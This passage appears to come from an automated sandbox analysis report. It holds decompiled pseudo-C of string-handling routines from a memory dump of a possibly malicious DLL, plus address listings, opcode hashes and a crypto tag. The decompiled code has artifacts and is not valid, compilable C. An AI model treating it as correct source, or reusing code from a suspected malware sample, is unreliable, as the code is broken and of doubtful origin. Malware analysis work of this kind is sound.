																_t301 = _v24 + _t381 * 2;
																_t434 =  *_t301 & 0x0000ffff;
																__eflags = ( *(_t339 + _t381 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																_t448 = _t434 + 0x20;
																_t435 =  <=  ? _t448 : _t434;
																__eflags = ( <=  ? _t448 : _t434) - _v44;
																if(( <=  ? _t448 : _t434) == _v44) {
																	break;
																}
																__eflags =  *(_t339 + _t381 * 2) & 0x0000ffff;
																if(( *(_t339 + _t381 * 2) & 0x0000ffff) != 0) {
																	continue;
																} else {
																	goto L55;
																}
																goto L180;
															}
															_t400 = _v52;
															_t452 = _v36;
															_t465 = _v32;
															_t336 = _t400;
															__eflags = _t400;
															if(_t400 == 0) {
																goto L141;
															}
														}
													}
												} else {
													_v36 = _t452;
													_t448 = 0;
													_v32 = _t466;
													_t325 = _v68;
													L156:
													__eflags = _t301;
													if(_t301 != 0) {
														goto L50;
													} else {
														goto L157;
													}
												}
											}
										}
										L180:
										L141:
										_v36 = _t452;
										_t374 =  ~( ~_t336 + 0x00000007 & 0x00000007) + 0x7fffffff;
										__eflags = _t374;
										_v32 = _t465;
										while(1) {
											asm("movdqu xmm1, [edi+ebx*2]");
											asm("pcmpeqw xmm1, xmm0");
											asm("pmovmskb esi, xmm1");
											__eflags = _t465;
											if(_t465 != 0) {
												break;
											}
											_t336 = _t336 + 8;
											__eflags = _t336 - _t374;
											if(_t336 < _t374) {
												continue;
											} else {
												_t452 = _v36;
												_t466 = _v32;
												__eflags = _t374 - 0x7fffffff;
												if(_t374 >= 0x7fffffff) {
													goto L149;
												} else {
													goto L145;
												}
											}
											goto L180;
										}
										asm("bsf ecx, ecx");
										_t452 = _v36;
										_t377 = (_t465 >> 1) + _t336;
										_t466 = _v32;
										goto L159;
									}
								}
								L56:
								_t326 = _t325 - _t463;
								__eflags = _t326;
								_t327 = _t326 >> 1;
								if(_t326 != 0) {
									__eflags = _t463;
									if(_t463 == 0) {
										_t401 = 0;
									} else {
										_t291 = _t463 & 0x0000000f;
										__eflags = _t291;
										if(_t291 == 0) {
											L71:
											_t401 =  ~( ~_t291 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t401;
											while(1) {
												asm("movdqu xmm1, [esi+eax*2]");
												asm("pcmpeqw xmm1, xmm0");
												asm("pmovmskb edi, xmm1");
												__eflags = _t448;
												if(_t448 != 0) {
													break;
												}
												_t291 = _t291 + 8;
												__eflags = _t291 - _t401;
												if(_t291 < _t401) {
													continue;
												} else {
													__eflags = _t401 - 0x7fffffff;
													if(_t401 >= 0x7fffffff) {
														goto L77;
													} else {
														goto L75;
													}
												}
												goto L78;
											}
											asm("bsf edx, edi");
											_t401 = (_t401 >> 1) + _t291;
										} else {
											_t401 = 0;
											__eflags = _t291 & 0x00000001;
											if((_t291 & 0x00000001) != 0) {
												while(1) {
													L75:
													__eflags =  *(_t463 + _t401 * 2) & 0x0000ffff;
													if(( *(_t463 + _t401 * 2) & 0x0000ffff) == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - 0x7fffffff;
													if(_t401 < 0x7fffffff) {
														continue;
													} else {
														L77:
														_t401 = 0x7fffffff;
													}
													goto L78;
												}
											} else {
												_t291 =  ~_t291 + 0x10 >> 1;
												__eflags = _t291;
												while(1) {
													_t448 =  *(_t463 + _t401 * 2) & 0x0000ffff;
													__eflags = _t448;
													if(_t448 == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - _t291;
													if(_t401 < _t291) {
														continue;
													} else {
														goto L71;
													}
													goto L78;
												}
											}
										}
									}
									L78:
									_t264 = _t401 >> 0x0000001f & _t401;
									_t402 = _t401 - _t264;
									__eflags = _t327;
									if(_t327 < 0) {
										L80:
										_t327 = _t402;
									} else {
										__eflags = _t327 - _t402;
										if(_t327 > _t402) {
											goto L80;
										}
									}
									_t403 = _a4;
									_t449 = _t463 + _t264 * 2;
									 *_t403 = 0;
									 *((intOrPtr*)(_t403 + 4)) = 0;
									__eflags = _t449;
									if(_t449 == 0) {
										L116:
										_push(0x80);
										_t317 = E6E791030();
										_t481 = _t481 + 4;
										_t268 =  *_a4;
										__eflags = _t268;
										if(_t268 == 0) {
											__eflags = 0;
											 *_t317 = 0;
										} else {
											__eflags = _t317;
											if(_t317 != 0) {
												_t404 =  *_t268 & 0x0000ffff;
												 *_t317 = _t404;
												__eflags = _t404;
												if(_t404 != 0) {
													_t405 = 0;
													__eflags = 0;
													while(1) {
														_t405 = _t405 + 1;
														_t359 =  *(_t268 + _t405 * 4 - 2) & 0x0000ffff;
														 *(_t317 + _t405 * 4 - 2) = _t359;
														__eflags = _t359;
														if(_t359 == 0) {
															goto L122;
														}
														_t360 =  *(_t268 + _t405 * 4) & 0x0000ffff;
														 *(_t317 + _t405 * 4) = _t360;
														__eflags = _t360;
														if(_t360 != 0) {
															continue;
														}
														goto L122;
													}
												}
											}
											L122:
											_push(2);
											_push(_t268);
											E6E7910B0();
											_t481 = _t481 + 8;
										}
										goto L124;
									} else {
										_t271 =  *_t449 & 0x0000ffff;
										__eflags = _t271;
										if(_t271 == 0) {
											goto L116;
										} else {
											__eflags = _t327;
											if(_t327 == 0) {
												_t417 = _t449 & 0x0000000f;
												__eflags = _t417;
												if(_t417 == 0) {
													L89:
													_t327 =  ~( ~_t417 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t327;
													while(1) {
														asm("movdqu xmm1, [edi+edx*2]");
														asm("pcmpeqw xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t271;
														if(_t271 != 0) {
															break;
														}
														_t417 = _t417 + 8;
														__eflags = _t417 - _t327;
														if(_t417 < _t327) {
															continue;
														} else {
															__eflags = _t327 - 0x7fffffff;
															if(_t327 >= 0x7fffffff) {
																goto L95;
															} else {
																goto L93;
															}
														}
														goto L96;
													}
													asm("bsf ebx, eax");
													_t327 = (_t327 >> 1) + _t417;
												} else {
													_t327 = 0;
													__eflags = _t417 & 0x00000001;
													if((_t417 & 0x00000001) != 0) {
														while(1) {
															L93:
															__eflags =  *(_t449 + _t327 * 2) & 0x0000ffff;
															if(( *(_t449 + _t327 * 2) & 0x0000ffff) == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - 0x7fffffff;
															if(_t327 < 0x7fffffff) {
																continue;
															} else {
																L95:
																_t327 = 0x7fffffff;
															}
															goto L96;
														}
													} else {
														_t417 =  ~_t417 + 0x10 >> 1;
														__eflags = _t417;
														while(1) {
															_t271 =  *(_t449 + _t327 * 2) & 0x0000ffff;
															__eflags = _t271;
															if(_t271 == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - _t417;
															if(_t327 < _t417) {
																continue;
															} else {
																goto L89;
															}
															goto L96;
														}
													}
												}
											}
											L96:
											_t114 = _t327 + 1; // 0x80000000
											_t406 = _t114;
											__eflags = _t406 - 0x40;
											_t407 =  <=  ? 0x40 : _t406;
											__eflags = _t407;
											if(_t407 > 0) {
												_t277 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
												_t408 = _t407 & 0x8000003f;
												__eflags = _t408;
												if(_t408 < 0) {
													_t408 = (_t408 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t408;
												}
												__eflags = _t408;
												_t278 = _t277 + (0 | _t408 > 0x00000000);
												_v68 = _t278 << 6;
												_push(_t278 << 7);
												_t464 = E6E791030();
												_t481 = _t481 + 4;
												_t411 =  *_a4;
												__eflags = _t411;
												if(_t411 == 0) {
													__eflags = 0;
													 *_t464 = 0;
												} else {
													__eflags = _t464;
													if(_t464 != 0) {
														_t287 =  *_t411 & 0x0000ffff;
														 *_t464 = _t287;
														__eflags = _t287;
														if(_t287 != 0) {
															_t288 = 0;
															__eflags = 0;
															while(1) {
																_t288 = _t288 + 1;
																_t363 =  *(_t411 + _t288 * 4 - 2) & 0x0000ffff;
																 *(_t464 + _t288 * 4 - 2) = _t363;
																__eflags = _t363;
																if(_t363 == 0) {
																	goto L106;
																}
																_t364 =  *(_t411 + _t288 * 4) & 0x0000ffff;
																 *(_t464 + _t288 * 4) = _t364;
																__eflags = _t364;
																if(_t364 != 0) {
																	continue;
																}
																goto L106;
															}
														}
													}
													L106:
													_push(2);
													_push(_t411);
													E6E7910B0();
													_t481 = _t481 + 8;
												}
												_t412 = _a4;
												_t412[1] = _v68;
												 *_t412 = _t464;
											} else {
												_t464 = 0;
											}
											__eflags = _t464;
											if(_t464 != 0) {
												_t284 = 0;
												while(1) {
													_t413 =  *_t449 & 0x0000ffff;
													_t284 = _t284 + 1;
													 *_t464 = _t413;
													__eflags = _t327;
													if(_t327 == 0) {
														goto L114;
													}
													__eflags = _t284 - _t327;
													if(_t284 == _t327) {
														 *(_t464 + 2) = 0;
													} else {
														goto L114;
													}
													goto L125;
													L114:
													__eflags = _t413;
													if(_t413 != 0) {
														_t464 = _t464 + 2;
														_t449 = _t449 + 2;
														__eflags = _t449;
														continue;
													}
													goto L125;
												}
											}
										}
									}
								} else {
									_t426 = _a4;
									_push(0x80);
									 *_t426 = 0;
									 *((intOrPtr*)(_t426 + 4)) = 0;
									_t317 = E6E791030();
									_t481 = _t481 + 4;
									_t298 =  *_a4;
									__eflags = _t298;
									if(_t298 == 0) {
										 *_t317 = 0;
									} else {
										__eflags = _t317;
										if(_t317 != 0) {
											_t427 =  *_t298 & 0x0000ffff;
											 *_t317 = _t427;
											__eflags = _t427;
											if(_t427 != 0) {
												_t428 = 0;
												__eflags = 0;
												while(1) {
													_t428 = _t428 + 1;
													_t365 =  *(_t298 + _t428 * 4 - 2) & 0x0000ffff;
													 *(_t317 + _t428 * 4 - 2) = _t365;
													__eflags = _t365;
													if(_t365 == 0) {
														goto L63;
													}
													_t366 =  *(_t298 + _t428 * 4) & 0x0000ffff;
													 *(_t317 + _t428 * 4) = _t366;
													__eflags = _t366;
													if(_t366 != 0) {
														continue;
													}
													goto L63;
												}
											}
										}
										L63:
										_push(2);
										_push(_t298);
										E6E7910B0();
										_t481 = _t481 + 8;
									}
									L124:
									_t250 = _a4;
									 *_t250 = _t317;
									_t250[1] = 0x40;
								}
								goto L125;
							}
							L157:
							_t463 = _v40;
							goto L56;
						}
					} else {
						goto L40;
					}
				}
				L125:
				_push(2);
				_push(_v64);
				E6E7910B0();
				_v64 = 0;
				_v60 = 0;
				return _a4;
				goto L180;
			}

0x6e79ae8e
0x6e79ae92
0x6e79ae94
0x6e79ae98
0x6e79aea2
0x6e79aea4
0x6e79aea7
0x6e79aead
0x6e79aee7
0x6e79aee9
0x6e79aeaf
0x6e79aeb1
0x6e79aeb3
0x6e79aeb6
0x6e79aebb
0x6e79aebf
0x6e79aebf
0x6e79aec0
0x6e79aec5
0x6e79aecc
0x00000000
0x00000000
0x6e79aece
0x6e79aed2
0x6e79aed8
0x00000000
0x00000000
0x00000000
0x6e79aed8
0x6e79aebf
0x6e79aebb
0x6e79aeda
0x6e79aeda
0x6e79aedc
0x6e79aedd
0x6e79aee2
0x6e79aee2
0x6e79aef0
0x6e79aef8
0x6e79aefe
0x6e79af09
0x6e79af0b
0x6e79b6df
0x6e79b6e4
0x6e79af11
0x6e79af13
0x6e79af13
0x6e79af16
0x6e79af36
0x6e79af3a
0x6e79af46
0x6e79af46
0x6e79af4c
0x6e79af4c
0x6e79af51
0x6e79af55
0x6e79af59
0x6e79af5b
0x00000000
0x00000000
0x6e79af61
0x6e79af64
0x6e79af66
0x00000000
0x6e79af68
0x6e79af68
0x6e79af6e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79af6e
0x00000000
0x6e79af66
0x6e79b6d3
0x6e79b6d8
0x00000000
0x6e79af18
0x6e79af18
0x6e79af1a
0x6e79af1c
0x6e79af70
0x6e79af70
0x6e79af74
0x6e79af76
0x00000000
0x00000000
0x6e79af7c
0x6e79af7d
0x6e79af83
0x00000000
0x6e79af85
0x6e79af85
0x6e79af85
0x6e79af8a
0x6e79af8a
0x00000000
0x6e79af83
0x00000000
0x6e79af1e
0x6e79af23
0x6e79af23
0x6e79af25
0x6e79af25
0x6e79af29
0x6e79af2b
0x00000000
0x00000000
0x6e79af31
0x6e79af32
0x6e79af34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79af34
0x6e79b458
0x6e79b458
0x6e79b45b
0x6e79b46b
0x6e79b45d
0x6e79b45f
0x6e79b462
0x6e79b462
0x6e79b45b
0x6e79af1c
0x6e79af16
0x6e79af8f
0x6e79af94
0x6e79af94
0x6e79af97
0x6e79af9a
0x6e79af9d
0x6e79af9f
0x6e79afb4
0x6e79afb7
0x6e79afb7
0x6e79afbd
0x6e79afc5
0x6e79afc5
0x6e79afc5
0x6e79afc6
0x6e79afd0
0x6e79afd7
0x6e79afd8
0x6e79afe0
0x6e79afe2
0x6e79afe5
0x6e79afe9
0x6e79afeb
0x6e79b033
0x6e79b035
0x6e79afed
0x6e79afed
0x6e79afef
0x6e79aff1
0x6e79aff4
0x6e79aff7
0x6e79aff9
0x6e79affb
0x6e79affe
0x6e79affe
0x6e79b000
0x6e79b000
0x6e79b001
0x6e79b006
0x6e79b00b
0x6e79b00d
0x00000000
0x00000000
0x6e79b00f
0x6e79b013
0x6e79b017
0x6e79b019
0x00000000
0x00000000
0x00000000
0x6e79b019
0x6e79b01b
0x6e79b01b
0x6e79aff9
0x6e79b01e
0x6e79b020
0x6e79b021
0x6e79b025
0x6e79b02a
0x6e79b02e
0x6e79b02e
0x6e79b038
0x6e79b03c
0x6e79afa1
0x6e79afa1
0x6e79afa1
0x6e79b044
0x6e79b048
0x6e79b04e
0x6e79b052
0x6e79af00
0x6e79af00
0x6e79af00
0x6e79b057
0x6e79b059
0x6e79b05f
0x6e79b068
0x6e79b068
0x6e79b06d
0x6e79b072
0x6e79b074
0x6e79b07c
0x6e79b07e
0x6e79b084
0x6e79b088
0x6e79b0c7
0x6e79b08a
0x6e79b08c
0x6e79b08e
0x6e79b091
0x6e79b096
0x6e79b098
0x6e79b09a
0x6e79b09a
0x6e79b09b
0x6e79b0a0
0x6e79b0a7
0x00000000
0x00000000
0x6e79b0a9
0x6e79b0ad
0x6e79b0b3
0x00000000
0x00000000
0x00000000
0x6e79b0b3
0x6e79b09a
0x6e79b096
0x6e79b0b5
0x6e79b0b5
0x6e79b0b7
0x6e79b0b8
0x6e79b0bd
0x6e79b0bd
0x00000000
0x6e79b061
0x6e79b061
0x6e79b066
0x6e79b0cf
0x6e79b0d5
0x6e79b0da
0x6e79b0dc
0x6e79b66c
0x6e79b671
0x6e79b676
0x6e79b678
0x6e79b680
0x6e79b682
0x6e79b688
0x6e79b68a
0x6e79b68c
0x6e79b6cb
0x6e79b68e
0x6e79b68e
0x6e79b690
0x6e79b692
0x6e79b695
0x6e79b698
0x6e79b69a
0x6e79b69c
0x6e79b69c
0x6e79b69e
0x6e79b69e
0x6e79b69f
0x6e79b6a4
0x6e79b6a9
0x6e79b6ab
0x00000000
0x00000000
0x6e79b6ad
0x6e79b6b1
0x6e79b6b5
0x6e79b6b7
0x00000000
0x00000000
0x00000000
0x6e79b6b7
0x6e79b69e
0x6e79b69a
0x6e79b6b9
0x6e79b6b9
0x6e79b6bb
0x6e79b6bc
0x6e79b6c1
0x6e79b6c1
0x00000000
0x6e79b0e2
0x6e79b0e6
0x6e79b0e9
0x6e79b0ec
0x6e79b0ef
0x6e79b0f3
0x6e79b0f6
0x6e79b0f9
0x6e79b10a
0x6e79b10e
0x6e79b112
0x6e79b116
0x6e79b116
0x6e79b118
0x6e79b11c
0x6e79b11c
0x6e79b11e
0x6e79b120
0x6e79b120
0x6e79b123
0x00000000
0x00000000
0x6e79b12d
0x6e79b12f
0x00000000
0x6e79b135
0x6e79b135
0x6e79b139
0x6e79b13b
0x6e79b13e
0x6e79b13e
0x6e79b144
0x6e79b147
0x6e79b14d
0x6e79b150
0x6e79b154
0x6e79b15b
0x6e79b15e
0x6e79b161
0x00000000
0x00000000
0x6e79b16b
0x6e79b16d
0x00000000
0x6e79b16f
0x6e79b16f
0x6e79b16f
0x6e79b172
0x6e79b172
0x00000000
0x6e79b16d
0x6e79b49c
0x6e79b4a0
0x6e79b4a4
0x6e79b4a8
0x6e79b4ba
0x6e79b4ba
0x6e79b4bc
0x6e79b4be
0x00000000
0x00000000
0x6e79b4c0
0x6e79b4c0
0x6e79b4c2
0x6e79b4c4
0x6e79b537
0x6e79b537
0x6e79b53b
0x6e79b53f
0x6e79b543
0x6e79b545
0x00000000
0x00000000
0x6e79b54b
0x6e79b54c
0x6e79b552
0x00000000
0x6e79b554
0x6e79b554
0x00000000
0x6e79b554
0x00000000
0x6e79b552
0x6e79b64d
0x00000000
0x6e79b4c6
0x6e79b4c6
0x6e79b4ca
0x6e79b4cc
0x6e79b4d0
0x6e79b4d4
0x6e79b4d8
0x6e79b4da
0x00000000
0x00000000
0x6e79b4e0
0x6e79b4e1
0x6e79b4e3
0x00000000
0x6e79b4e5
0x6e79b4e5
0x6e79b4e9
0x00000000
0x6e79b4e9
0x00000000
0x6e79b4e3
0x6e79b5c5
0x6e79b5c9
0x6e79b5cd
0x6e79b5cd
0x6e79b5cf
0x6e79b558
0x6e79b558
0x00000000
0x6e79b5d1
0x6e79b5d1
0x6e79b55d
0x6e79b55d
0x6e79b561
0x6e79b561
0x6e79b563
0x6e79b567
0x6e79b56b
0x6e79b56f
0x6e79b56f
0x6e79b57a
0x6e79b57e
0x6e79b584
0x6e79b587
0x6e79b58d
0x6e79b593
0x6e79b596
0x6e79b599
0x00000000
0x00000000
0x6e79b59d
0x6e79b59f
0x6e79b5ab
0x6e79b5ab
0x6e79b5af
0x6e79b5af
0x6e79b5b1
0x00000000
0x6e79b5a1
0x6e79b5a1
0x6e79b5a2
0x6e79b5a6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b5a6
0x00000000
0x6e79b59f
0x6e79b5e2
0x6e79b5e6
0x6e79b5ea
0x6e79b5f0
0x6e79b5f0
0x6e79b5f3
0x00000000
0x6e79b5f9
0x6e79b5fd
0x6e79b5ff
0x00000000
0x6e79b605
0x6e79b605
0x6e79b609
0x6e79b609
0x6e79b60b
0x6e79b60f
0x6e79b613
0x6e79b617
0x6e79b617
0x6e79b621
0x6e79b624
0x6e79b62a
0x6e79b631
0x6e79b634
0x6e79b637
0x6e79b63a
0x00000000
0x00000000
0x6e79b644
0x6e79b646
0x00000000
0x6e79b648
0x00000000
0x6e79b648
0x00000000
0x6e79b646
0x6e79b4ae
0x6e79b4b2
0x6e79b4b6
0x6e79b4ba
0x6e79b4bc
0x6e79b4be
0x00000000
0x00000000
0x6e79b4be
0x6e79b5ff
0x6e79b5d3
0x6e79b5d3
0x6e79b5d7
0x6e79b5d9
0x6e79b5dd
0x6e79b5b4
0x6e79b5b4
0x6e79b5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b5b6
0x6e79b5d1
0x6e79b5cf
0x00000000
0x6e79b4ed
0x6e79b4f9
0x6e79b4fd
0x6e79b4fd
0x6e79b503
0x6e79b50b
0x6e79b50b
0x6e79b510
0x6e79b514
0x6e79b518
0x6e79b51a
0x00000000
0x00000000
0x6e79b520
0x6e79b523
0x6e79b525
0x00000000
0x6e79b527
0x6e79b527
0x6e79b52b
0x6e79b52f
0x6e79b535
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b535
0x00000000
0x6e79b525
0x6e79b658
0x6e79b65d
0x6e79b661
0x6e79b663
0x00000000
0x6e79b663
0x6e79b4ba
0x6e79b176
0x6e79b176
0x6e79b176
0x6e79b178
0x6e79b17a
0x6e79b1e3
0x6e79b1e5
0x6e79b495
0x6e79b1eb
0x6e79b1ed
0x6e79b1ed
0x6e79b1f0
0x6e79b20c
0x6e79b218
0x6e79b218
0x6e79b21e
0x6e79b21e
0x6e79b223
0x6e79b227
0x6e79b22b
0x6e79b22d
0x00000000
0x00000000
0x6e79b233
0x6e79b236
0x6e79b238
0x00000000
0x6e79b23a
0x6e79b23a
0x6e79b240
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b240
0x00000000
0x6e79b238
0x6e79b489
0x6e79b48e
0x6e79b1f2
0x6e79b1f2
0x6e79b1f4
0x6e79b1f6
0x6e79b242
0x6e79b242
0x6e79b246
0x6e79b248
0x00000000
0x00000000
0x6e79b24a
0x6e79b24b
0x6e79b251
0x00000000
0x6e79b253
0x6e79b253
0x6e79b253
0x6e79b253
0x00000000
0x6e79b251
0x6e79b1f8
0x6e79b1fd
0x6e79b1fd
0x6e79b1ff
0x6e79b1ff
0x6e79b203
0x6e79b205
0x00000000
0x00000000
0x6e79b207
0x6e79b208
0x6e79b20a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b20a
0x6e79b1ff
0x6e79b1f6
0x6e79b1f0
0x6e79b258
0x6e79b25d
0x6e79b25f
0x6e79b261
0x6e79b263
0x6e79b269
0x6e79b269
0x6e79b265
0x6e79b265
0x6e79b267
0x00000000
0x00000000
0x6e79b267
0x6e79b26b
0x6e79b26e
0x6e79b273
0x6e79b275
0x6e79b278
0x6e79b27a
0x6e79b3d0
0x6e79b3d0
0x6e79b3da
0x6e79b3dc
0x6e79b3e2
0x6e79b3e4
0x6e79b3e6
0x6e79b420
0x6e79b422
0x6e79b3e8
0x6e79b3e8
0x6e79b3ea
0x6e79b3ec
0x6e79b3ef
0x6e79b3f2
0x6e79b3f4
0x6e79b3f6
0x6e79b3f6
0x6e79b3f8
0x6e79b3f8
0x6e79b3f9
0x6e79b3fe
0x6e79b403
0x6e79b405
0x00000000
0x00000000
0x6e79b407
0x6e79b40b
0x6e79b40f
0x6e79b411
0x00000000
0x00000000
0x00000000
0x6e79b411
0x6e79b3f8
0x6e79b3f4
0x6e79b413
0x6e79b413
0x6e79b415
0x6e79b416
0x6e79b41b
0x6e79b41b
0x00000000
0x6e79b280
0x6e79b280
0x6e79b283
0x6e79b285
0x00000000
0x6e79b28b
0x6e79b28b
0x6e79b28d
0x6e79b291
0x6e79b291
0x6e79b294
0x6e79b2b1
0x6e79b2bd
0x6e79b2bd
0x6e79b2c3
0x6e79b2c3
0x6e79b2c8
0x6e79b2cc
0x6e79b2d0
0x6e79b2d2
0x00000000
0x00000000
0x6e79b2d8
0x6e79b2db
0x6e79b2dd
0x00000000
0x6e79b2df
0x6e79b2df
0x6e79b2e5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b2e5
0x00000000
0x6e79b2dd
0x6e79b47d
0x6e79b482
0x6e79b296
0x6e79b296
0x6e79b298
0x6e79b29b
0x6e79b2e7
0x6e79b2e7
0x6e79b2eb
0x6e79b2ed
0x00000000
0x00000000
0x6e79b2ef
0x6e79b2f0
0x6e79b2f6
0x00000000
0x6e79b2f8
0x6e79b2f8
0x6e79b2f8
0x6e79b2f8
0x00000000
0x6e79b2f6
0x6e79b29d
0x6e79b2a2
0x6e79b2a2
0x6e79b2a4
0x6e79b2a4
0x6e79b2a8
0x6e79b2aa
0x00000000
0x00000000
0x6e79b2ac
0x6e79b2ad
0x6e79b2af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b2af
0x6e79b2a4
0x6e79b29b
0x6e79b294
0x6e79b2fd
0x6e79b302
0x6e79b302
0x6e79b305
0x6e79b308
0x6e79b30b
0x6e79b30d
0x6e79b320
0x6e79b323
0x6e79b323
0x6e79b329
0x6e79b331
0x6e79b331
0x6e79b331
0x6e79b332
0x6e79b33c
0x6e79b346
0x6e79b349
0x6e79b34f
0x6e79b351
0x6e79b357
0x6e79b359
0x6e79b35b
0x6e79b395
0x6e79b397
0x6e79b35d
0x6e79b35d
0x6e79b35f
0x6e79b361
0x6e79b364
0x6e79b367
0x6e79b369
0x6e79b36b
0x6e79b36b
0x6e79b36d
0x6e79b36d
0x6e79b36e
0x6e79b373
0x6e79b378
0x6e79b37a
0x00000000
0x00000000
0x6e79b37c
0x6e79b380
0x6e79b384
0x6e79b386
0x00000000
0x00000000
0x00000000
0x6e79b386
0x6e79b36d
0x6e79b369
0x6e79b388
0x6e79b388
0x6e79b38a
0x6e79b38b
0x6e79b390
0x6e79b390
0x6e79b39a
0x6e79b3a0
0x6e79b3a3
0x6e79b30f
0x6e79b30f
0x6e79b30f
0x6e79b3a5
0x6e79b3a7
0x6e79b3ad
0x6e79b3b7
0x6e79b3b7
0x6e79b3ba
0x6e79b3bb
0x6e79b3be
0x6e79b3c0
0x00000000
0x00000000
0x6e79b3c2
0x6e79b3c4
0x6e79b477
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b3ca
0x6e79b3ca
0x6e79b3cc
0x6e79b3b1
0x6e79b3b4
0x6e79b3b4
0x00000000
0x6e79b3b4
0x00000000
0x6e79b3cc
0x6e79b3b7
0x6e79b3a7
0x6e79b285
0x6e79b17c
0x6e79b17c
0x6e79b181
0x6e79b186
0x6e79b188
0x6e79b190
0x6e79b192
0x6e79b198
0x6e79b19a
0x6e79b19c
0x6e79b1db
0x6e79b19e
0x6e79b19e
0x6e79b1a0
0x6e79b1a2
0x6e79b1a5
0x6e79b1a8
0x6e79b1aa
0x6e79b1ac
0x6e79b1ac
0x6e79b1ae
0x6e79b1ae
0x6e79b1af
0x6e79b1b4
0x6e79b1b9
0x6e79b1bb
0x00000000
0x00000000
0x6e79b1bd
0x6e79b1c1
0x6e79b1c5
0x6e79b1c7
0x00000000
0x00000000
0x00000000
0x6e79b1c7
0x6e79b1ae
0x6e79b1aa
0x6e79b1c9
0x6e79b1c9
0x6e79b1cb
0x6e79b1cc
0x6e79b1d1
0x6e79b1d1
0x6e79b425
0x6e79b425
0x6e79b428
0x6e79b42a
0x6e79b42a
0x00000000
0x6e79b17a
0x6e79b5bc
0x6e79b5bc
0x00000000
0x6e79b5bc
0x00000000
0x00000000
0x00000000
0x6e79b066
0x6e79b431
0x6e79b431
0x6e79b433
0x6e79b437
0x6e79b441
0x6e79b445
0x6e79b455
0x00000000

Strings

@, xrefs: 6E79AEF0

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction ID: f5d1db90c383250f20e2dd8d4a9eedf47d4e08f9bf4130cb718689ee0dcde782
Opcode Fuzzy Hash: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction Fuzzy Hash: 55420671A047138BD7148FAEE69022A73E2FFC9710B14863DE8958B3B8E774E811E745

Uniqueness

Uniqueness Score: -1.00%

Function 6E79B6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E79B6F0(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed short* _t217;
				unsigned int _t225;
				signed int _t226;
				signed short** _t231;
				signed short* _t235;
				signed int* _t237;
				signed int _t242;
				signed int _t246;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t266;
				signed int _t269;
				unsigned int _t275;
				signed int _t276;
				void* _t282;
				signed int _t285;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t319;
				signed int _t321;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t355;
				void* _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				unsigned int _t385;
				unsigned int _t386;
				unsigned int _t389;
				signed int _t390;
				signed int _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int* _t408;
				signed int _t409;
				signed int _t413;
				signed int _t422;
				signed int _t424;
				signed short* _t425;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t438;
				signed int _t444;
				signed int _t446;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				void* _t461;

				_v52 = 0;
				_t438 = __ecx;
				_v48 = 0;
				_push(0x80);
				_t422 = E6E791030();
				_t461 = (_t458 & 0xfffffff0) - 0x34 + 4;
				_t217 = _v52;
				if(_t217 == 0) {
					__eflags = 0;
					 *_t422 = 0;
					L8:
					_v48 = 0x40;
					_v52 = _t422;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t422;
						if(_t422 == 0) {
							_t338 = 0x40;
							_t300 = 0;
							L23:
							_t24 = _t300 + 2; // -2147483652
							_t368 = _t24;
							__eflags = _t368 - 0x40;
